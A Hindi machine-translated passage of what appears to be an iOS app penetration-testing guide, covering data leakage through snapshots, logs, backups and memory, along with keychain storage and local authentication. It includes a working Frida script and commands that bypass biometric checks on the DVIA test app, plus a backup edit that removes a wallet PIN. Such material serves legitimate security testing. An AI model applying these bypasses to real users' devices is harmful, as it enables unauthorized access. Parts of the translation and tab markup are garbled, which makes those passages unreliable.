एक अल्पकालिक सत्र विन्यास वस्तु एक डिफ़ॉल्ट सत्र विन्यास (डिफ़ॉल्ट देखें) के समान है, केवल यह सत्र वस्तु चाचा, पहचान स्टोर, या किसी भी सत्र संबंधित डेटा को डिस्क पर स्टोर नहीं करता है। बजाय इसके, सत्र संबंधित डेटा RAM में स्टोर किया जाता है। एक अल्पकालिक सत्र डिस्क पर डेटा लिखता है केवल जब आप इसे एक URL की सामग्री को एक फ़ाइल में लिखने के लिए कहते हैं। 3. कैश को .notAllowed पॉलिसी पर सेट करके कैश को अक्षम किया जा सकता है। यह किसी भी तरीके से कैश स्टोर करने को अक्षम कर देगा, चाहे वह मेमोरी में हो या डिस्क पर।

स्नैपशॉट

जब भी आप होम बटन दबाते हैं, iOS वर्तमान स्क्रीन का स्नैपशॉट लेता है ताकि एप्लिकेशन के लिए स्मूद तरीके से स्थानांतरण किया जा सके। हालांकि, यदि संवेदनशील डेटा वर्तमान स्क्रीन में मौजूद है, तो यह छवि में सहेजा जाएगा (जो रीबूट के बाद भी बना रहता है)। ये स्नैपशॉट हैं जिन्हें आप एक्सेस कर सकते हैं डबल टैप करके होम स्क्रीन पर एप्लिकेशनों के बीच स्विच करने के लिए।

जब तक iPhone जेलब्रोकन नहीं है, हमलावर को इन स्क्रीनशॉट को देखने के लिए उपकरण अनब्लॉक करने की आवश्यकता होती है। डिफ़ॉल्ट रूप से आखिरी स्नैपशॉट ऐप्लिकेशन के सैंडबॉक्स में Library/Caches/Snapshots/ या Library/SplashBoard/Snapshots फ़ोल्डर में स्टोर किया जाता है (विश्वसनीय कंप्यूटर iOX 7.0 से फ़ाइल सिस्टम तक पहुंच नहीं कर सकते हैं)।

इस बुरी व्यवहार को रोकने का एक तरीका स्नैपशॉट लेने से पहले एक खाली स्क्रीन डालना या संवेदनशील डेटा हटाना है ApplicationDidEnterBackground() फ़ंक्शन का उपयोग करके।

निम्नलिखित एक नमूना सुधारने की विधि है जो एक डिफ़ॉल्ट स्क्रीनशॉट सेट करेगी।

Swift:

private var backgroundImage: UIImageView?

func applicationDidEnterBackground(_ application: UIApplication) {
let myBanner = UIImageView(image: #imageLiteral(resourceName: "overlayImage"))
myBanner.frame = UIScreen.main.bounds
backgroundImage = myBanner
window?.addSubview(myBanner)
}

func applicationWillEnterForeground(_ application: UIApplication) {
backgroundImage?.removeFromSuperview()
}

उद्देश्य-सी:

@property (UIImageView *)backgroundImage;

- (void)applicationDidEnterBackground:(UIApplication *)application {
UIImageView *myBanner = [[UIImageView alloc] initWithImage:@"overlayImage.png"];
self.backgroundImage = myBanner;
self.backgroundImage.bounds = UIScreen.mainScreen.bounds;
[self.window addSubview:myBanner];
}

- (void)applicationWillEnterForeground:(UIApplication *)application {
[self.backgroundImage removeFromSuperview];
}

यह ऐप्लिकेशन को बैकग्राउंड में जब भी बैकग्राउंड में जाता है, overlayImage.png को बैकग्राउंड इमेज के रूप में सेट करता है। यह संवेदनशील डेटा लीक को रोकता है क्योंकि overlayImage.png हमेशा मौजूदा व्यू को ओवरराइड करेगा।

Keychain

iOS की कीचेन तक पहुंचने और उसे प्रबंधित करने के लिए, Keychain-Dumper जैसे उपकरण उपलब्ध हैं, जो जेलब्रोकन डिवाइस के लिए उपयुक्त हैं। इसके अतिरिक्त, Objection ने समान उद्देश्यों के लिए ios keychain dump नामक कमांड प्रदान किया है।

क्रेडेंशियल्स स्टोर करना

NSURLCredential कक्षा सीधे कीचेन में संवेदनशील जानकारी सहेजने के लिए आदर्श है, NSUserDefaults या अन्य लेपकों की आवश्यकता को छोड़ते हुए। लॉगिन के बाद क्रेडेंशियल्स को स्टोर करने के लिए, निम्नलिखित स्विफ्ट कोड का उपयोग किया जाता है:

NSURLCredential *credential;
credential = [NSURLCredential credentialWithUser:username password:password persistence:NSURLCredentialPersistencePermanent];
[[NSURLCredentialStorage sharedCredentialStorage] setCredential:credential forProtectionSpace:self.loginProtectionSpace];

कस्टम कीबोर्ड और कीबोर्ड कैश

iOS 8.0 के बाद, उपयोगकर्ता कस्टम कीबोर्ड एक्सटेंशन इंस्टॉल कर सकते हैं, जो सेटिंग्स > सामान्य > कीबोर्ड > कीबोर्ड के अंडर प्रबंधन किए जा सकते हैं। जबकि ये कीबोर्ड विस्तारित कार्यक्षमता प्रदान करते हैं, वे कीस्ट्रोक लॉगिंग और डेटा को बाहरी सर्वरों को भेजने का खतरा उठाते हैं, हालांकि उपयोगकर्ताओं को नेटवर्क एक्सेस की आवश्यकता होने पर सूचित किया जाता है। ऐप्स को कस्टम कीबोर्ड का उपयोग संवेदनशील जानकारी दर्ज करने के लिए प्रतिबंधित कर सकते हैं।

सुरक्षा सिफारिशें:

  • सुरक्षा को बढ़ाने के लिए तीसरे पक्ष की कीबोर्ड को अक्षम करना सिफारिश किया जाता है।
  • डिफ़ॉल्ट iOS कीबोर्ड के ऑटोकरेक्ट और ऑटो-सुझाव सुविधाओं के बारे में जागरूक रहें, जो Library/Keyboard/{locale}-dynamic-text.dat या /private/var/mobile/Library/Keyboard/dynamic-text.dat में संग्रहित संवेदनशील जानकारी को संग्रहित कर सकते हैं। ये कैश फ़ाइलें नियमित रूप से संवेदनशील डेटा के लिए जांची जानी चाहिए। कैश डेटा को साफ करने के लिए सेटिंग्स > सामान्य > रीसेट > कीबोर्ड डिक्शनरी रीसेट का सिफारिश किया जाता है।
  • नेटवर्क ट्रैफ़िक को अंतरण करने से पता चल सकता है कि क्या कस्टम कीबोर्ड रिमोट रूप से कीस्ट्रोक भेज रहा है।

टेक्स्ट फ़ील्ड कैशिंग को रोकना

UITextInputTraits protocol गलती सुधारने और सुरक्षित टेक्स्ट एंट्री को सक्षम करने के लिए गुण प्रदान करता है, जो संवेदनशील जानकारी कैशिंग को रोकने के लिए आवश्यक है। उदाहरण के लिए, ऑटोकरेक्शन को अक्षम करना और सुरक्षित टेक्स्ट एंट्री को सक्षम करना इस प्राप्त किया जा सकता है:

textObject.autocorrectionType = UITextAutocorrectionTypeNo;
textObject.secureTextEntry = YES;

इसके अतिरिक्त, डेवलपर्स को सुनिश्चित करना चाहिए कि पाठ क्षेत्र, खासकर पासवर्ड और पिन जैसी संवेदनशील जानकारी दर्ज करने के लिए, autocorrectionType को UITextAutocorrectionTypeNo और secureTextEntry को YES सेट करके कैशिंग को अक्षम करना चाहिए।

UITextField *textField = [[UITextField alloc] initWithFrame:frame];
textField.autocorrectionType = UITextAutocorrectionTypeNo;

लॉग

डीबगिंग कोड में अक्सर लॉगिंग का उपयोग होता है। लॉग में संवेदनशील जानकारी हो सकती है, इसमें एक जोखिम होता है। पहले, iOS 6 और पुराने संस्करणों में, सभी ऐप्स तक लॉग पहुंचने की स्थिति थी, जिससे संवेदनशील डेटा का लीक होने का खतरा था। अब, ऐप्लिकेशन केवल अपने लॉग तक पहुंच सकती हैं

इन प्रतिबंधों के बावजूद, एक हमलावर जिसके पास फिजिकल एक्सेस है एक अनलॉक किए गए डिवाइस का, इसे कंप्यूटर से कनेक्ट करके इसका शोध कर सकता है और लॉग पढ़ सकता है। यह महत्वपूर्ण है कि लॉग ऐप के अनइंस्टॉलेशन के बाद भी डिस्क पर बने रहते हैं।

रिस्क को कम करने के लिए, सुझाव दिया जाता है कि ऐप के साथ गहराई से इंटरैक्ट किया जाए, सभी इसके कार्यक्षमताओं और इनपुट की जांच की जाए ताकि कोई संवेदनशील जानकारी अनजाने में लॉग नहीं हो रही हो।

पोटेंशियल लीक्स के लिए ऐप के स्रोत कोड की समीक्षा करते समय, पूर्वनिर्धारित और कस्टम लॉगिंग स्टेटमेंट्स के लिए खोजें जैसे कि NSLog, NSAssert, NSCAssert, fprintf जैसे इनबिल्ट-इन फंक्शन्स के लिए, और कस्टम इम्प्लीमेंटेशन के लिए Logging या Logfile के किसी उल्लेख को।

सिस्टम लॉग की मॉनिटरिंग

ऐप्स विभिन्न संवेदनशील जानकारी लॉग करते हैं। इन लॉगों को मॉनिटर करने के लिए, टूल और कमांड्स जैसे:

idevice_id --list   # To find the device ID
idevicesyslog -u <id> (| grep <app>)   # To capture the device logs

उपयोगी हैं। इसके अतिरिक्त, Xcode कॉन्सोल लॉग एकत्र करने का एक तरीका प्रदान करता है:

  1. Xcode खोलें।
  2. iOS डिवाइस कनेक्ट करें।
  3. Window -> Devices and Simulators पर जाएं।
  4. अपने डिवाइस को चुनें।
  5. आप जिस समस्या का जांच कर रहे हैं, उसे ट्रिगर करें।
  6. लॉग नए विंडो में देखने के लिए Open Console बटन का उपयोग करें।

अधिक उन्नत लॉगिंग के लिए, डिवाइस शैली से कनेक्ट करना और socat का उपयोग करके वास्तविक समय में लॉग मॉनिटरिंग प्रदान कर सकता है:

iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock

जासूसी के लिए लॉग गतिविधियों को देखने के लिए निम्नलिखित कमांडों का पालन करें, जो समस्याओं का निदान करने या लॉग में संभावित डेटा लीकेज की पहचान के लिए अमूल्य हो सकते हैं।



Trickest का उपयोग करें ताकि आप आसानी से वर्ल्ड के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित वर्कफ़्लो बना सकें।
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

बैकअप

ऑटो-बैकअप सुविधाएं iOS में एकीकृत हैं, जो iTunes (macOS Catalina तक), Finder (macOS Catalina के बाद) या iCloud के माध्यम से डिवाइस डेटा कॉपियों का निर्माण सुविधा प्रदान करते हैं। ये बैकअप लगभग सभी डिवाइस डेटा को शामिल करते हैं, एप्पल पे विवरण और टच आईडी विन्यास जैसे उच्चतम संवेदनशील तत्वों को छोड़कर।

सुरक्षा जोखिम

बैकअप में स्थापित एप्लिकेशन और उनके डेटा को शामिल करने से डेटा लीकेज का मुद्दा उठता है और यह खतरा है कि बैकअप संशोधन एप्लिकेशन कार्यक्षमता को बदल सकते हैं। इन जोखिमों को कम करने के लिए सलाह दी जाती है कि किसी भी एप्लिकेशन के निर्देशिका या उसके उपनिर्देशिकाओं में सामान्य जानकारी को सादा में न रखें।

बैकअप से फ़ाइलों को छोड़ना

Documents/ और Library/Application Support/ में फ़ाइलें डिफ़ॉल्ट रूप से बैकअप होती हैं। डेवलपर्स NSURLIsExcludedFromBackupKey के साथ NSURL setResourceValue:forKey:error: का उपयोग करके विशिष्ट फ़ाइलें या निर्देशिकाओं को बैकअप से छोड़ सकते हैं। यह अभ्यास संवेदनशील डेटा को बैकअप में शामिल होने से बचाने के लिए महत्वपूर्ण है।

सुरक्षा जोखिमों के लिए परीक्षण

एक एप्लिकेशन के बैकअप सुरक्षा का मूल्यांकन करने के लिए, पहले Finder का उपयोग करके एक बैकअप बनाएं, फिर एप्पल के आधिकारिक दस्तावेज़ीकरण से मार्गदर्शन प्राप्त करके इसे ढूंढें। एप्लिकेशन के प्रभाव पर प्रभाव डालने के लिए संवेदनशील डेटा या विन्यास की जांच करें।

संवेदनशील जानकारी को कमांड-लाइन उपकरण या iMazing जैसे एप्लिकेशन का उपयोग करके खोजा जा सकता है। एन्क्रिप्टेड बैकअप के लिए, एन्क्रिप्शन की मौजूदगी को बैकअप की मूल निर्देशिका में "Manifest.plist" फ़ाइल में "IsEncrypted" कुंजी की जांच करके पुष्टि की जा सकती है।

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
...
<key>Date</key>
<date>2021-03-12T17:43:33Z</date>
<key>IsEncrypted</key>
<true/>
...
</plist>

एन्क्रिप्टेड बैकअप का सामना करने के लिए, DinoSec के GitHub रेपो में उपलब्ध Python स्क्रिप्ट, जैसे backup_tool.py और backup_passwd.py, उपयोगी हो सकते हैं, हालांकि नवीनतम iTunes/Finder संस्करणों के संगतता के लिए समायोजन की आवश्यकता हो सकती है। iOSbackup टूल एक और विकल्प है जिसका उपयोग पासवर्ड से सुरक्षित बैकअप के भीतर फ़ाइलों तक पहुंचने के लिए किया जा सकता है।

ऐप व्यवहार को संशोधित करना

बैकअप संशोधन के माध्यम से ऐप व्यवहार को बदलने का एक उदाहरण Bither बिटकॉइन वॉलेट ऐप में प्रदर्शित किया गया है, जहां UI लॉक पिन pin_code कुंजी के तहत net.bither.plist में संग्रहीत है। इस कुंजी को प्लिस्ट से हटाना और बैकअप को पुनर्स्थापित करना पिन आवश्यकता को हटा देता है, अप्रत्याशित पहुंच प्रदान करता है।

संवेदनशील डेटा के लिए मेमोरी परीक्षण पर सारांश

एक ऐप्लिकेशन की मेमोरी में संग्रहित संवेदनशील जानकारी का समय सीमित करना महत्वपूर्ण है। मेमोरी सामग्री की जांच के लिए दो मुख्य दृष्टिकोण हैं: मेमोरी डंप बनाना और मेमोरी का वास्तविक समय में विश्लेषण। दोनों तरीके के चुनौतियां हैं, जिसमें डंप प्रक्रिया या विश्लेषण के दौरान महत्वपूर्ण डेटा छूटने की संभावना है।

मेमोरी डंप प्राप्त करना और विश्लेषण

जेलब्रोकन और गैर-जेलब्रोकन उपकरणों के लिए, objection और Fridump जैसे उपकरण ऐप की प्रक्रिया मेमोरी को डंप करने की अनुमति देते हैं। एक बार डंप हो जाने पर, इस डेटा का विश्लेषण करने के लिए विभिन्न उपकरणों की आवश्यकता होती है, जो आप खोज रहे हैं जानकारी के प्रकार पर निर्भर करता है।

मेमोरी डंप से स्ट्रिंग्स निकालने के लिए, strings या rabin2 -zz जैसे कमांड का उपयोग किया जा सकता है:

# Extracting strings using strings command
$ strings memory > strings.txt

# Extracting strings using rabin2
$ rabin2 -ZZ memory > strings.txt

और विस्तृत विश्लेषण के लिए, विशेष डेटा प्रकार या पैटर्न की खोज के लिए radare2 व्यापक खोज क्षमताएँ प्रदान करता है:

$ r2 <name_of_your_dump_file>
[0x00000000]> /?
...

रनटाइम मेमोरी विश्लेषण

r2frida एक शक्तिशाली विकल्प प्रदान करता है एक ऐप की मेमोरी की जांच करने के लिए वास्तविक समय में, किसी मेमोरी डंप की आवश्यकता के बिना। यह उपकरण चल रहे एप्लिकेशन की मेमोरी पर सीधे खोज कमांड का निष्पादन संभव बनाता है:

$ r2 frida://usb//<name_of_your_app>
[0x00000000]> /\ <search_command>

टूटी हुई गुप्तचरण

कमजोर की मेनेजमेंट प्रक्रियाएँ

कुछ डेवलपर संवेदनशील डेटा को स्थानीय संग्रहण में सहेजते हैं और इसे कोड में हार्डकोड/पूर्वानुमानित एक कुंजी के साथ एन्क्रिप्ट करते हैं। यह नहीं किया जाना चाहिए क्योंकि कुछ पलटाव के द्वारा हमलावरों को गोपनीय जानकारी निकालने की अनुमति हो सकती है।

असुरक्षित और/या पुराने एल्गोरिदम का उपयोग

डेवलपरों को पुराने एल्गोरिदम का उपयोग नहीं करना चाहिए जो प्रमाणीकरण जांचें, संग्रहण या भेजें डेटा करने के लिए। कुछ इन एल्गोरिदमों में शामिल हैं: RC4, MD4, MD5, SHA1... उदाहरण के लिए पासवर्ड संग्रहण के लिए हैश का उपयोग किया जाता है, तो हैश ब्रूट-फोर्स प्रतिरोधी के साथ उपयोग किया जाना चाहिए।

जांच

यदि आप कोड में हार्डकोड पासवर्ड/रहस्य ढूंढने में सक्षम हैं, या यदि वे पूर्वानुमानित हैं, और यदि कोड किसी प्रकार के कमजोर गुप्तचरण एल्गोरिदम का उपयोग कर रहा है, तो यह मुख्य जांच है।

यह दिलचस्प है कि आप कुछ क्रिप्टो लाइब्रेरी को स्वचालित रूप से objection का उपयोग करके मॉनिटर कर सकते हैं:

ios monitor crypt

अधिक जानकारी के लिए iOS एन्क्रिप्टिक API और लाइब्रेरी तक पहुंचने के लिए https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography

स्थानीय प्रमाणीकरण

स्थानीय प्रमाणीकरण विशेष भूमिका निभाता है, विशेष रूप से जब यह एक दूरस्थ संबंध से पहुंच सुरक्षित करने के लिए एन्क्रिप्टिक विधियों के माध्यम से संबंधित होता है। यहाँ का सारांश यह है कि उचित अमल के बिना, स्थानीय प्रमाणीकरण तंत्र को ऊपर से छलने किया जा सकता है।

एप्पल का स्थानीय प्रमाणीकरण फ्रेमवर्क और कीचेन डेवलपरों के लिए मजबूत API प्रदान करते हैं ताकि वे उपयोगकर्ता प्रमाणीकरण संवाद और गोपनीय डेटा सुरक्षित रूप से संभाल सकें। सुरक्षित एन्क्लेव टच आईडी के लिए उंगली की पहचान को सुरक्षित रूप से संरक्षित करता है, जबकि फेस आईडी बायोमेट्रिक डेटा को कम किए बिना चेहरे की पहचान पर निर्भर करता है।

टच आईडी/फेस आईडी को एकीकृत करने के लिए डेवलपरों के पास दो API विकल्प हैं:

  • LocalAuthentication.framework उच्च स्तरीय उपयोगकर्ता प्रमाणीकरण के लिए जिसमें बायोमेट्रिक डेटा तक पहुंच नहीं होती।
  • Security.framework निचले स्तर की कीचेन सेवाओं तक पहुंच के लिए, गोपनीय डेटा को बायोमेट्रिक प्रमाणीकरण के साथ सुरक्षित रूप से संरक्षित करता है। विभिन्न ओपन-सोर्स रैपर्स कीचेन तक पहुंच को सरल बनाने में मदद करते हैं।

{% hint style="danger" %} हालांकि, LocalAuthentication.framework और Security.framework दोनों ही विकल्प दोषपूर्ण हैं, क्योंकि वे मुख्य रूप से बूलियन मान लौटाते हैं बिना प्रमाणीकरण प्रक्रियाओं के लिए डेटा प्रसारित किए, जिससे उन्हें छलने के लिए संवेदनशील बना दिया जा सकता है (देखें Don't touch me that way, by David Lindner et al)। {% endhint %}

स्थानीय प्रमाणीकरण का अमल

उपयोगकर्ताओं से प्रमाणीकरण के लिए प्रोम्प्ट करने के लिए, डेवलपरों को LAContext वर्ग के evaluatePolicy विधि का उपयोग करना चाहिए, जिसमें चयन करना है:

  • deviceOwnerAuthentication: टच आईडी या डिवाइस पासकोड के लिए प्रोम्प्ट करता है, यदि दोनों सक्षम नहीं हैं तो विफल हो जाता है।
  • deviceOwnerAuthenticationWithBiometrics: केवल टच आईडी के लिए प्रोम्प्ट करता है।

एक सफल प्रमाणीकरण evaluatePolicy से बूलियन लौटाने के द्वारा दिखाया जाता है, जो एक संभावित सुरक्षा दोष को हाइलाइट करता है।

कीचेन का उपयोग करके स्थानीय प्रमाणीकरण

iOS ऐप्स में स्थानीय प्रमाणीकरण को लागू करने में कीचेन API का उपयोग गोपनीय डेटा जैसे प्रमाणीकरण टोकन सुरक्षित रूप से स्टोर करने के लिए होता है। यह प्रक्रिया सुनिश्चित करती है कि डेटा केवल उपयोगकर्ता द्वारा ही पहुंचा जा सकता है, उनके डिवाइस पासकोड या टच आईडी जैसे बायोमेट्रिक प्रमाणीकरण का उपयोग करके।

कीचेन आइटम्स को SecAccessControl विशेषता के साथ सेट करने की क्षमता प्रदान करता है, जो आइटम तक पहुंच को उपयोगकर्ता के द्वारा सफलतापूर्वक प्रमाणीकरण करने तक प्रतिबंधित करता ह। यह सुरक्षा को बढ़ाने के लिए महत्वपूर्ण है।

नीचे स्विफ्ट और ऑब्जेक्टिव-सी में कोड उदाहरण हैं जो दिखाते हैं कि कैसे कीचेन में स्ट्रिंग को सेव और पुनः प्राप्त करने के लिए सुरक्षा विशेषताओं का उपयोग करते हुए कैसे सेट किया जाता ह। उदाहरण विशेष रूप से दिखाते हैं कि कैसे एक्सेस नियंत्रण सेट करने के लिए टच आईडी प्रमाणीकरण की आवश्यकता है और सुनिश्चित करते हैं कि डेटा केवल उस डिवाइस पर ही पहुंचा जा सकता है, जिस पर यह सेट किया गया था, उस शर्त के तहत कि डिवाइस पासकोड कॉन्फ़िगर किया गया है।

{% tabs %} {% tab title="स्विफ्ट" %}

// From https://github.com/mufambisi/owasp-mstg/blob/master/Document/0x06f-Testing-Local-Authentication.md

// 1. create AccessControl object that will represent authentication settings

var error: Unmanaged<CFError>?

guard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault,
kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
SecAccessControlCreateFlags.biometryCurrentSet,
&error) else {
// failed to create AccessControl object

return
}

// 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute

var query: [String: Any] = [:]

query[kSecClass as String] = kSecClassGenericPassword
query[kSecAttrLabel as String] = "com.me.myapp.password" as CFString
query[kSecAttrAccount as String] = "OWASP Account" as CFString
query[kSecValueData as String] = "test_strong_password".data(using: .utf8)! as CFData
query[kSecAttrAccessControl as String] = accessControl

// 3. save item

let status = SecItemAdd(query as CFDictionary, nil)

if status == noErr {
// successfully saved
} else {
// error while saving
}

{% endtab %}

{% tab title="Objective-C" %}हैकर्स Objective-C कोड की जांच करने के लिए उपयोग कर सकते हैं। यह कोड अक्सर iOS ऐप्स में प्रयोग किया जाता है और सुरक्षा जांच के लिए महत्वपूर्ण हो सकता है।{% endtab %}

// 1. create AccessControl object that will represent authentication settings
CFErrorRef *err = nil;

SecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault,
kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
kSecAccessControlUserPresence,
err);

// 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute
NSDictionary* query = @{
(_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,
(__bridge id)kSecAttrLabel: @"com.me.myapp.password",
(__bridge id)kSecAttrAccount: @"OWASP Account",
(__bridge id)kSecValueData: [@"test_strong_password" dataUsingEncoding:NSUTF8StringEncoding],
(__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef
};

// 3. save item
OSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil);

if (status == noErr) {
// successfully saved
} else {
// error while saving
}

{% endtab %} {% endtabs %}

अब हम कीचेन से सहेजे गए आइटम का अनुरोध कर सकते हैं। कीचेन सेवाएं प्रमाणीकरण डायलॉग प्रदर्शित करेगी और उपयोक्ता को डेटा या निल वापस करेगी या नहीं, यह उस आदर्श अंगुली प्रदान की गई थी या नहीं, इस पर निर्भर करेगी।

// 1. define query
var query = [String: Any]()
query[kSecClass as String] = kSecClassGenericPassword
query[kSecReturnData as String] = kCFBooleanTrue
query[kSecAttrAccount as String] = "My Name" as CFString
query[kSecAttrLabel as String] = "com.me.myapp.password" as CFString
query[kSecUseOperationPrompt as String] = "Please, pass authorisation to enter this area" as CFString

// 2. get item
var queryResult: AnyObject?
let status = withUnsafeMutablePointer(to: &queryResult) {
SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0))
}

if status == noErr {
let password = String(data: queryResult as! Data, encoding: .utf8)!
// successfully received password
} else {
// authorization not passed
}

{% endtab %}

{% tab title="Objective-C" %}

ऑब्जेक्टिव-सी

आईओएस ऐप्स की पेंटेस्टिंग के लिए ऑब्जेक्टिव-सी कोड की सुरक्षा जांच करने के लिए निम्नलिखित टूल्स का उपयोग किया जा सकता है:

  • Otool: बाइनरी फ़ाइल के अंदर की जानकारी प्रदान करता है
  • class-dump-z: क्लास और मेथड की जानकारी प्रदान करता ह२
  • Hopper: डिसेम्बलर और डिसेम्बल करने के लिए उपयोग किया जा सकता है

इन टूल्स का उपयोग करके आप ऐप्स के सुरक्षा रिस्क्स को जांच सकते हैं और सुरक्षित कोडिंग प्रथाओं को लागू कर सकते हैं।

{% endtab %}

// 1. define query
NSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,
(__bridge id)kSecReturnData: @YES,
(__bridge id)kSecAttrAccount: @"My Name1",
(__bridge id)kSecAttrLabel: @"com.me.myapp.password",
(__bridge id)kSecUseOperationPrompt: @"Please, pass authorisation to enter this area" };

// 2. get item
CFTypeRef queryResult = NULL;
OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult);

if (status == noErr){
NSData* resultData = ( __bridge_transfer NSData* )queryResult;
NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];
NSLog(@"%@", password);
} else {
NSLog(@"Something went wrong");
}

पता लगाना

ऐप में फ्रेमवर्क का उपयोग भी ऐप बाइनरी की साझा डायनामिक लाइब्रेरी की सूची का विश्लेषण करके पता लगाया जा सकता है। इसे otool का उपयोग करके किया जा सकता है:

$ otool -L <AppName>.app/<AppName>

यदि ऐप में LocalAuthentication.framework का उपयोग किया गया है, तो उत्पादन में निम्नलिखित दोनों पंक्तियाँ शामिल होंगी (ध्यान दें कि LocalAuthentication.framework Security.framework का उपयोग करता है):

/System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication
/System/Library/Frameworks/Security.framework/Security

यदि Security.framework का उपयोग किया गया है, तो केवल दूसरा दिखाया जाएगा।

स्थानीय प्रमाणीकरण फ्रेमवर्क बाईपास

आपत्ति

आपत्ति बायोमेट्रिक्स बाईपास के माध्यम से, जो इस GitHub पेज पर स्थित है, एक तकनीक उपलब्ध है जिसका उपयोग स्थानीय प्रमाणीकरण तंत्र को पार करने के लिए किया जा सकता है। इस दृष्टिकोण का मूल तत्व Frida का उपयोग करना है evaluatePolicy फ़ंक्शन को मानिपुलेट करने के लिए, सुनिश्चित करना कि यह हमेशा True परिणाम देता है, वास्तविक प्रमाणीकरण सफलता के अनुसार नहीं। यह खराब बायोमेट्रिक प्रमाणीकरण प्रक्रियाओं को घुमाने के लिए विशेष रूप से उपयोगी है।

इस बाईपास को सक्रिय करने के लिए, निम्नलिखित कमांड का उपयोग किया जाता है:

...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass
(agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # (agent) [3mhtws9x47q] Localized Reason for auth requirement: Please authenticate yourself
(agent) [3mhtws9x47q] OS authentication response: false
(agent) [3mhtws9x47q] Marking OS response as True instead
(agent) [3mhtws9x47q] Biometrics bypass hook complete

यह कमांड एक क्रम को शुरू करता है जहाँ Objection एक कार्य को पंजीकृत करता है जो evaluatePolicy चेक के परिणाम को True में परिवर्तित करता है।

Frida

evaluatePolicy का उपयोग का एक उदाहरण DVIA-v2 एप्लिकेशन से:

+(void)authenticateWithTouchID {
LAContext *myContext = [[LAContext alloc] init];
NSError *authError = nil;
NSString *myLocalizedReasonString = @"Please authenticate yourself";

if ([myContext canEvaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics error:&authError]) {
[myContext evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics
localizedReason:myLocalizedReasonString
reply:^(BOOL success, NSError *error) {
if (success) {
dispatch_async(dispatch_get_main_queue(), ^{
[TouchIDAuthentication showAlert:@"Authentication Successful" withTitle:@"Success"];
});
} else {
dispatch_async(dispatch_get_main_queue(), ^{
[TouchIDAuthentication showAlert:@"Authentication Failed !" withTitle:@"Error"];
});
}
}];
} else {
dispatch_async(dispatch_get_main_queue(), ^{
[TouchIDAuthentication showAlert:@"Your device doesn't support Touch ID or you haven't configured Touch ID authentication on your device" withTitle:@"Error"];
});
}
}

द्वितीयक स्थानीय प्रमाणीकरण को बाईपास करने के लिए, एक फ्रिडा स्क्रिप्ट लिखा जाता है। यह स्क्रिप्ट evaluatePolicy चेक को लक्षित करता है, इसके कॉलबैक को अंतर्दृष्टि करके सुनिश्चित करता है कि यह success=1 लौटाता है। कॉलबैक के व्यवहार को बदलकर, प्रमाणीकरण जांच को प्रभावी ढंग से बाईपास किया जाता है।

नीचे दिया गया स्क्रिप्ट evaluatePolicy विधि के परिणाम को संशोधित करने के लिए इंजेक्ट किया जाता है। यह कॉलबैक के परिणाम को हमेशा सफलता की संकेत करने के लिए बदलता है।

// from https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/
if(ObjC.available) {
console.log("Injecting...");
var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"];
Interceptor.attach(hook.implementation, {
onEnter: function(args) {
var block = new ObjC.Block(args[4]);
const callback = block.implementation;
block.implementation = function (error, value)  {

console.log("Changing the result value to true")
const result = callback(1, null);
return result;
};
},
});
} else {
console.log("Objective-C Runtime is not available!");
}

फ्रिडा स्क्रिप्ट इंजेक्ट करने और बायोमेट्रिक प्रमाणीकरण को छलकर बाहर निकलने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:

frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-ios.js

IPC के माध्यम से संवेदनशीलता का उजागर होना

कस्टम URI हैंडलर / डीपलिंक्स / कस्टम स्कीम

{% content-ref url="ios-custom-uri-handlers-deeplinks-custom-schemes.md" %} ios-custom-uri-handlers-deeplinks-custom-schemes.md {% endcontent-ref %}

यूनिवर्सल लिंक्स

{% content-ref url="ios-universal-links.md" %} ios-universal-links.md {% endcontent-ref %}

UIActivity साझा करना

{% content-ref url="ios-uiactivity-sharing.md" %} ios-uiactivity-sharing.md {% endcontent-ref %}

UIPasteboard

{% content-ref url="ios-uipasteboard.md" %} ios-uipasteboard.md {% endcontent-ref %}

ऐप एक्सटेंशन्स

{% content-ref url="ios-app-extensions.md" %} ios-app-extensions.md {% endcontent-ref %}

वेबव्यू

{% content-ref url="ios-webviews.md" %} ios-webviews.md {% endcontent-ref %}

सिरीयलाइजेशन और इन्कोडिंग

{% content-ref url="ios-serialisation-and-encoding.md" %} ios-serialisation-and-encoding.md {% endcontent-ref %}

नेटवर्क संचार

बिना एन्क्रिप्शन के कोई संचार न हो रहा है और यह भी महत्वपूर्ण है कि एप्लिकेशन सही ढंग से सर्वर का TLS सर्टिफिकेट सत्यापित कर रहा है।
इन प्रकार की समस्याओं की जांच के लिए आप Burp जैसा प्रॉक्सी उपयोग कर सकते हैं:

